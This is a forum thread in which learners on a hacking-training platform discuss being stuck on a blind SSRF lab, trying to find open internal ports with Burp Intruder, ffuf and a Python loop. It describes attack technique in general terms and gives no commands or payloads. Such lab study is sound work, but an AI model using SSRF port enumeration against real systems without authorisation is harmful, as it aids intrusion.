HTB Academy - Server-side Attacks Blind SSRF

I’ve looked through all of the other forums and don’t see anything useful. There are a few cryptic messages, but I am just trying to find other ports open in the Blind SSRF past 80. I currently have Burp going in an intruder attack sorting through all port numbers one by one. This of course, is taking forever. I have tried to ffuf like in Identifying and Exploiting. With exploiting, the raft-small words give me a ton of hits.

I also wrote a Python loop to give me every number then fuzzed the port with it and only had 80 come back.

I’ve been stuck on this for 5 days and the CBBH is part of my MS degree and I’m struggling badly. The directions I can follow, but they just end. It talks about getting files, and then the question is to get the other port. I am apparently missing something and need guidance.

Hack The Box - Academy

The Editorial box featured Blind SSRF. I’m not sure if its still active, but that would be a great place to start.

That box really helped me understand the concept through trial and error.

I was able to eventually ffuf the port number and look at the size of the result.

yes, I’m struck on this too, the result is too many ports with “Something went wrong!” and the length is also not much useful.

did you find a way?